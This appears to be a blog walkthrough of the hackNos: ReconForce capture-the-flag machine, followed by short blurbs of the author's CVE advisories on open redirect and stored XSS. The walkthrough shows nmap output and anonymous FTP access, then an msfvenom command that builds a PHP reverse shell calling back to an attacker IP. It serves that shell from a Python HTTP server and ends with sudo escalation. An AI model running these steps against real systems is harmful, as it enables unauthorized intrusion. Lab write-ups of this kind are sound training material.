hackNos: ReconForce Walkthrough

hackNos: ReconForce Walkthrough

Nmap-

Nmap scan report for 192.168.56.106
Host is up, received arp-response (0.0012s latency).
Scanned at 2020-02-17 13:51:07 India Standard Time for 26s
Not shown: 997 closed ports
Reason: 997 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
|   3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDUlaO7CqI0Ngdhn5k6s6OsO6t4cSdKNECxUIjQqHx894S3C6wTCfZh6AkmnfSHPka/AtopEqGwr078jY5Vqkpg+YAmuT0rvc++tlSV7Jwn6q1gjaNUlkoUg7bMNlyBsOTBv977JB3GYcD0UgrB02vjRxbrhRgyNaxLWC5WUwHkhTCVeUQqP+2HASjnmV5nKMa5HYXNe4f9yeB6ZZ4xWaDwk6OTdRC8r/0Lmi5E2jmQWUc1i7ABZlInx/CTOqBDLCzKl/hxRO83U1o3gTx1GoahxcQrBm/wRP0hnTrns+dUC7bnlz8AVO5qV9vo953kfIV80GcgSXgBPF1ortOhGJcbr/I6awFMYXEauxHXGocOJ0FpwrkRwbz7Vr75eQA15bPpt+UmdUYzBrHOIkOafLt5F00ofU7pAyXDQBbI84HlbFEMNm2mHANgxaIasVMAf54jwckIonaDA9qZ7k2DQURX2InsA2KmRGKnC3x61NzeVuFwX25t4AqzceVuKWnjkIM=
|   256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFjhaMef9pyq2VUWLEn55nxXKJuNPyAxoh2pSygawGh8ozI/+Rbv9QOwNMuNRpaoEbl0UQRI2eekXg0f2r16JPw=
|   256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBojzCf/3K/qMpLEcKJ+8tok41HScNSx3vE3GZqb/UDy
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Recon_Web
MAC Address: 08:00:27:C1:56:8B (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/17%OT=21%CT=1%CU=40326%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5E4A4D0D%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=40%CD=S)

Uptime guess: 46.991 days (since Wed Jan 01 14:04:49 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.23 ms 192.168.56.106

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.01s elapsed
Read data files from: C:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.97 seconds
           Raw packets sent: 1111 (52.918KB) | Rcvd: 1072 (46.330KB)

Access FTP Service With anonymous access- (Found "Security@hackNos" in the ftp banner)

ftp 192.168.56.106
Connected to 192.168.56.106.
220 "Security@hackNos".
200 Always in UTF8 mode.
User (192.168.56.106:(none)): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> lsit
Invalid command.

Access Port 80-
login with some default credentials (i.e. admin/admin, admin/password) getting Unauthorized error-


Tried Login with default admin user and Security@hackNos password found above-


Login Successful- (Command Injection)

Creating PHP Shell with msfvenom- 
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f raw

Saved this file as shell1.php

Running Python Server-
python -m SimpleHTTPServer 8000


Downloading this Shell1.php file (as hosted above)-

File uploaded on the server and now access this shell1.php file to get the reverse Shell. 

Getting reverse Shell-

Python TTY Shell-



User.Txt File Access-
recon user details- (tried login to the user "recon" with found password "Security@hacknos", as this name is used in the website many times).
recon:x:1000:119:rahul:/home/recon:/bin/bash

Privilege Escalation-
(tried if the user recon has an entry in sudoers group, so lets Sudo su)

Thanks..

Comments

Post a Comment

Popular posts from this blog

Polaris’ Intellect Core Banking Software Version 9.7.1- Open Redirect [CVE-2018-14931]

Image
[+] Credits: Neeraj Kumar, Hai Dang Long [+] Email: neeraj.iiita2009@gmail.com Vendor: ==================== http://www.polarisft.com Product: =================== Polaris’ Intellect Core Banking, Core and Portal Module Version: =================== Affected Version: 9.7.1 Vulnerability Type: ==================== Open Redirect CVE Reference: ============== CVE-2018-14931 Vulnerability Details: ====================== Polaris’ Intellect Core Banking Software, In the Core module is vulnerable to open redirect vulnerability. Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the co
Read more

Stored XSS Vulnerability in Hot Scripts Clone:Script Classified Version 3.1-[CVE-2018-7650]

Image
[+] Credits:  Neeraj Kumar [+] Email:  neeraj.iiita2009@gmail.com Vendor: ==================== https://www.phpscriptsmall.com/ Product: =================== Hot Scripts Clone:Script Classified Version 3.1 Link to access the Product: ===================== https://www.phpscriptsmall.com/product/hot-scripts-clone-script-classified/ Vulnerability Type: ========================== Cross site scripting - Stored XSS CVE Reference: ============== CVE-2018-7650 Vulnerability Details: ====================== Hot Scripts Clone:Script Classified Version 3.1 Application is vulnerable to stored XSS with the "Add New" function in Management User. Within the "Add New" section the application does not sanitize user supplied input and renders injected javascript code to the users browsers. This is different from CVE-2018-6878. An attackers use this vulnerability to inject malicious javascript code such as hijack user sessions, malicious redirect, deface web
Read more

Stored XSS Vulnerability in Bookme Control Panel 2.0-[CVE-2018-8737]

Image
[+] Credits: Neeraj Kumar [+] Email: neeraj.iiita2009@gmail.com Vendor: ==================== https://bylancer.com Product: =================== Bookme Control Panel 2.0 Link to access the Product: =================== https://bylancer.com/products/bookme-wp-booking-plugin/ Vulnerability Type: ========================== Cross site scripting - Stored XSS CVE Reference: ============== CVE-2018-8737 Vulnerability Details: ====================== Bookme Control Panel 2.0 Application is vulnerable to stored XSS within the Customers "Book Me" function. Within the Name and Note (aka custName and custNote) sections of the Customers screen, the application does not sanitize user-supplied input and renders injected JavaScript code to the user's browser. Attackers use this vulnerability to inject malicious javascript code such as hijack user sessions, malicious redirect, deface web sites, insert hostile content, redirect users, hijack the user’s browser usin
Read more